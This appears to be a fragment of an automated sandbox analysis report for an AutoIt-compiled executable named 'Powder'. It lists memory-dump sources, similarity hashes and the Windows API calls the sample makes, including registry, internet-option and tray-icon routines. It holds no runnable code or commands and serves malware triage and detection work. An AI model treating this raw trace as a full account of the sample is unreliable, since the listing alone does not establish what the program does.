                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                  • String ID: <w
                                                  • API String ID: 3815369404-539545700
                                                  • Opcode ID: 95349b883149d6c30b03292d7e51210dd77b33e4f1375d350e98f485bc0e3bf0
                                                  • Instruction ID: 320db7caf0538f2cd84dbdf2b3bb054fc8cfaa1dd3a9023c08da87046b91e85f
                                                  • Opcode Fuzzy Hash: 95349b883149d6c30b03292d7e51210dd77b33e4f1375d350e98f485bc0e3bf0
                                                  • Instruction Fuzzy Hash: 6C41FFB090C2448FC359EF2BAD41E587BE4FB99301310917BE4A8F32B1EA36084ACF51
                                                  APIs
                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00E01275,SwapMouseButtons,00000004,?), ref: 00E012A8
                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00E01275,SwapMouseButtons,00000004,?), ref: 00E012C9
                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00E01275,SwapMouseButtons,00000004,?), ref: 00E012EB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: 6e1ba9362bde567323a51a8869b2fab2f6ed3bce08931e7cd40ff90de7c9e146
                                                  • Instruction ID: 91883273bb7bcc19c649126fa8341070a70c604d5179111976326822012a39e2
                                                  • Opcode Fuzzy Hash: 6e1ba9362bde567323a51a8869b2fab2f6ed3bce08931e7cd40ff90de7c9e146
                                                  • Instruction Fuzzy Hash: 54117C71514208BFDB218FA5DC84EEFBBBCEF05744F0055AAF805EB160D2319E84A7A0
                                                  APIs
                                                    • Part of subcall function 00E2593C: __FF_MSGBANNER.LIBCMT ref: 00E25953
                                                    • Part of subcall function 00E2593C: __NMSG_WRITE.LIBCMT ref: 00E2595A
                                                    • Part of subcall function 00E2593C: RtlAllocateHeap.NTDLL(01790000,00000000,00000001,?,00000004,?,?,00E21003,?), ref: 00E2597F
                                                  • std::exception::exception.LIBCMT ref: 00E2101C
                                                  • __CxxThrowException@8.LIBCMT ref: 00E21031
                                                    • Part of subcall function 00E287CB: RaiseException.KERNEL32(?,?,?,00EBCAF8,?,?,?,?,?,00E21036,?,00EBCAF8,?,00000001), ref: 00E28820
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                  • String ID: `=$h=
                                                  • API String ID: 3902256705-1319648006
                                                  • Opcode ID: 05ceb0c5caf8111ac7eb00e4751e927e20fd51080af86c6eabb2fc3aa26cfcb4
                                                  • Instruction ID: 89a8c1c8e2571fee4e5c033aa47771f8a4e0872d873e0433ee94a6f184b14ace
                                                  • Opcode Fuzzy Hash: 05ceb0c5caf8111ac7eb00e4751e927e20fd51080af86c6eabb2fc3aa26cfcb4
                                                  • Instruction Fuzzy Hash: 8BF0A43564422DB6CB20AA68FD16EDE77ECAF01314F202466F814B2291DFB18B80C6E4
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,00E92C4C), ref: 00E63F57
                                                  • GetLastError.KERNEL32 ref: 00E63F66
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E63F75
                                                  • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E92C4C), ref: 00E63FD2
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$AttributesErrorFileLast
                                                  • String ID:
                                                  • API String ID: 2267087916-0
                                                  • Opcode ID: c768cd899a8340e958a5fd3d092e2d0ffb2a7d3fa70279c45cbdb553f39b026d
                                                  • Instruction ID: b0bffad38ab4ad383920f661178864fd659b79826cd2a0be16543d0a65b270e7
                                                  • Opcode Fuzzy Hash: c768cd899a8340e958a5fd3d092e2d0ffb2a7d3fa70279c45cbdb553f39b026d
                                                  • Instruction Fuzzy Hash: 3E219470A482019F8700DF38D8858EAB7F4FF553A8F10665EF4A5E72A2D731DA49CB42
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E15B58
                                                    • Part of subcall function 00E156F8: _memset.LIBCMT ref: 00E15787
                                                    • Part of subcall function 00E156F8: _wcscpy.LIBCMT ref: 00E157DB
                                                    • Part of subcall function 00E156F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E157EB
                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00E15BAD
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E15BBC
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E50D7C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                  • String ID:
                                                  • API String ID: 1378193009-0
                                                  • Opcode ID: 6194c4862e411e44e42173e2533d74f0132b6795d4ec6151d8fc9fe620c3eb4d
                                                  • Instruction ID: ecd9c6bb1db4758829ec4c82638b780ed7a5663b3194039962a341d4a7bf5aa1
                                                  • Opcode Fuzzy Hash: 6194c4862e411e44e42173e2533d74f0132b6795d4ec6151d8fc9fe620c3eb4d
                                                  • Instruction Fuzzy Hash: 212107715087849FE7728B648899FEABBFCAF41308F04148EE6DA76181C37429C8CB51
                                                  APIs
                                                    • Part of subcall function 00E149C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E127AF,?,00000001), ref: 00E149F4
                                                  • _free.LIBCMT ref: 00E4FB04
                                                  • _free.LIBCMT ref: 00E4FB4B
                                                    • Part of subcall function 00E129BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E12ADF
                                                  Strings
                                                  • Bad directive syntax error, xrefs: 00E4FB33
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: Bad directive syntax error
                                                  • API String ID: 2861923089-2118420937
                                                  • Opcode ID: b53cd19117f98a519178146ac567df4ef8a67c467eb2376e2f4df350c93910e8
                                                  • Instruction ID: e23bc7d94099e3297b2c3f20775ca5b4798ce91beb81d3c774436542109a54c6
                                                  • Opcode Fuzzy Hash: b53cd19117f98a519178146ac567df4ef8a67c467eb2376e2f4df350c93910e8
                                                  • Instruction Fuzzy Hash: 3E916C71910219AFCF04EFA4D8519EEB7F4BF49314F10656AE916BB2A1DB309A44CB50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID: AU3! ?$EA06
                                                  • API String ID: 4104443479-1349402219
                                                  • Opcode ID: e8596a1463e8c3f391beb9d5e8006d79f22919d2f05cdfad1f88b61f1e4b9b9b
                                                  • Instruction ID: a79789728b3ccaa40477baa3fd3267046fa2f423044735caac87ff801e13de8e
                                                  • Opcode Fuzzy Hash: e8596a1463e8c3f391beb9d5e8006d79f22919d2f05cdfad1f88b61f1e4b9b9b
                                                  • Instruction Fuzzy Hash: 154189B1A042595BDF229B548851BFF7FE58F86310F286065FC82BB3C2D6218DC483A1
                                                  APIs
                                                    • Part of subcall function 00E14AB2: __fread_nolock.LIBCMT ref: 00E14AD0
                                                  • _wcscmp.LIBCMT ref: 00E69DE1
                                                  • _wcscmp.LIBCMT ref: 00E69DF4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$__fread_nolock
                                                  • String ID: FILE
                                                  • API String ID: 4029003684-3121273764
                                                  • Opcode ID: 3bd5a00b2b68d78e395d1d5bfcdb812e1533243ca4c71ad38710aa483d1832f4
                                                  • Instruction ID: 19114dc2f41d0c7cb3ee79696e9d7611ba01e29997a5986c1aff862b70a9845d
                                                  • Opcode Fuzzy Hash: 3bd5a00b2b68d78e395d1d5bfcdb812e1533243ca4c71ad38710aa483d1832f4
                                                  • Instruction Fuzzy Hash: 2141F872A40219BADF20DBA4DC45FEF77FDEF45754F01046AF900B7281E67199448B64
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E72C6A
                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E72CA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CrackInternet_memset
                                                  • String ID: |
                                                  • API String ID: 1413715105-2343686810
                                                  • Opcode ID: 46f04284e9a1ac0b8b56c2cc68f29ff777ed3bc012137f73e1c024a919ae61d0
                                                  • Instruction ID: ef3d65b4b4ffacc9aa5a21e279f1979332d83144ee45fa205ca34606c169db5f
                                                  • Opcode Fuzzy Hash: 46f04284e9a1ac0b8b56c2cc68f29ff777ed3bc012137f73e1c024a919ae61d0
                                                  • Instruction Fuzzy Hash: FD315D71C00119ABCF11EFA1CC85AEEBFB9FF04344F105059FA29B6166DB315A56DBA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E5032B
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 00E50375
                                                    • Part of subcall function 00E20284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E12A58,?,00008000), ref: 00E202A4
                                                    • Part of subcall function 00E209C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00E209E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                  • String ID: X
                                                  • API String ID: 3777226403-3081909835
                                                  • Opcode ID: 0a932c96f65b22deac0d53f4d679f07d4f8287255dd19380a3d07bbd442c9a83
                                                  • Instruction ID: e0a0f5a69018acb63756a9613fdaadc74085aebb70cb7b82e568fa8061dad0fb
                                                  • Opcode Fuzzy Hash: 0a932c96f65b22deac0d53f4d679f07d4f8287255dd19380a3d07bbd442c9a83
                                                  • Instruction Fuzzy Hash: 0321A171A002989BCF41DF94D805BEE7BF89F49304F00506AE404B7281DBB59A89CFA1
                                                  APIs
                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E728F8
                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E72921
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Internet$OpenOption
                                                  • String ID: <local>
                                                  • API String ID: 942729171-4266983199
                                                  • Opcode ID: bce56249b66832ee507c26312874a6aeb6c5da3c3eac782e6e997aebca287fa3
                                                  • Instruction ID: 479f47ce95505e2b267c703c34f38962b761b4d5e9e570e5ce580703990e8e5d
                                                  • Opcode Fuzzy Hash: bce56249b66832ee507c26312874a6aeb6c5da3c3eac782e6e997aebca287fa3
                                                  • Instruction Fuzzy Hash: 9411CE70501226BEEB288A51CC88EFBFBA8EF05364F10912FFA4966000E3716994D6E1
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83ec780eae6a5a1c587368d3c148457a8a542a82a669275af540f8ee42843475
                                                  • Instruction ID: 5a3df5116435ba74c4ee354c282fbd73b92d7ef76596fec55bebd38059604d18
                                                  • Opcode Fuzzy Hash: 83ec780eae6a5a1c587368d3c148457a8a542a82a669275af540f8ee42843475
                                                  • Instruction Fuzzy Hash: 99F12AB06083019FC714DF28C98496ABBF5FF88314F14992EF999AB291D731E945CF92
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E159F9
                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E15A9E
                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E15ABB
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: IconNotifyShell_$_memset
                                                  • String ID:
                                                  • API String ID: 1505330794-0
                                                  • Opcode ID: fea568dd83927b1b9bf283fac3805a890fa4419ace5c2d87045ad50dd98ae4ad
                                                  • Instruction ID: 853d5d65308b9653d1999886eb7c44fcc64eaac90e499c05213cdf199066756d
                                                  • Opcode Fuzzy Hash: fea568dd83927b1b9bf283fac3805a890fa4419ace5c2d87045ad50dd98ae4ad
                                                  • Instruction Fuzzy Hash: E83182B1505701CFD724DF25D884AD7BBE4FF88309F000A2EF5DAA2250D7716988CB51
                                                  APIs
                                                  • __FF_MSGBANNER.LIBCMT ref: 00E25953
                                                    • Part of subcall function 00E2A39B: __NMSG_WRITE.LIBCMT ref: 00E2A3C2
                                                    • Part of subcall function 00E2A39B: __NMSG_WRITE.LIBCMT ref: 00E2A3CC
                                                  • __NMSG_WRITE.LIBCMT ref: 00E2595A
                                                    • Part of subcall function 00E2A3F8: GetModuleFileNameW.KERNEL32(00000000,00EC53BA,00000104,00000004,00000001,00E21003), ref: 00E2A48A
                                                    • Part of subcall function 00E2A3F8: ___crtMessageBoxW.LIBCMT ref: 00E2A538
                                                    • Part of subcall function 00E232CF: ___crtCorExitProcess.LIBCMT ref: 00E232D5
                                                    • Part of subcall function 00E232CF: ExitProcess.KERNEL32 ref: 00E232DE
                                                    • Part of subcall function 00E28D58: __getptd_noexit.LIBCMT ref: 00E28D58
                                                  • RtlAllocateHeap.NTDLL(01790000,00000000,00000001,?,00000004,?,?,00E21003,?), ref: 00E2597F
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                  • String ID:
                                                  • API String ID: 1372826849-0
                                                  • Opcode ID: 5dcf1956c52a60e3c380a6df8f7657f57054e37a13ec18095841141636404c4d
                                                  • Instruction ID: bae15cc0d215254e520c0bc8d454b397d024ea90f8c5f6aa180fdbf155a98308
                                                  • Opcode Fuzzy Hash: 5dcf1956c52a60e3c380a6df8f7657f57054e37a13ec18095841141636404c4d
                                                  • Instruction Fuzzy Hash: 0001D233242B36DEE6156735BD02A6E32989FC2774F50203BF425BA1A1DE749D814A61
                                                  APIs
                                                  • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00E72970
                                                  • _memset.LIBCMT ref: 00E7298B
                                                  • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00E7299B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: InternetOptionQuery$_memset
                                                  • String ID:
                                                  • API String ID: 3210845847-0
                                                  • Opcode ID: e39fc3b3b6ee5189aa8624f4ed339f843e2dc03e485bcca689a035628f765764
                                                  • Instruction ID: 209246deb89596d4d9d2d7e392b4c64ba8622a15a2d343e3c6cb77143659a925
                                                  • Opcode Fuzzy Hash: e39fc3b3b6ee5189aa8624f4ed339f843e2dc03e485bcca689a035628f765764
                                                  • Instruction Fuzzy Hash: 1BF0A47144421CBFE720AF50DC81CEF3B9DEF143D4B449026FA0869141C6329E80CAA0
                                                  APIs
                                                  • _free.LIBCMT ref: 00E692D6
                                                    • Part of subcall function 00E22F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E29C54,00000000,00E28D5D,00E259C3), ref: 00E22F99
                                                    • Part of subcall function 00E22F85: GetLastError.KERNEL32(00000000,?,00E29C54,00000000,00E28D5D,00E259C3), ref: 00E22FAB
                                                  • _free.LIBCMT ref: 00E692E7
                                                  • _free.LIBCMT ref: 00E692F9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                  • Instruction ID: 308dbd6aa8355deac354a8b2fd746cc2fc06a0b24427aff97b7b99dfe7987466
                                                  • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                  • Instruction Fuzzy Hash: 2DE0C2A130461263DA20A5387A40E8377EC0FC8791714240EB509F3143CE30E8408028
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CALL
                                                  • API String ID: 0-4196123274
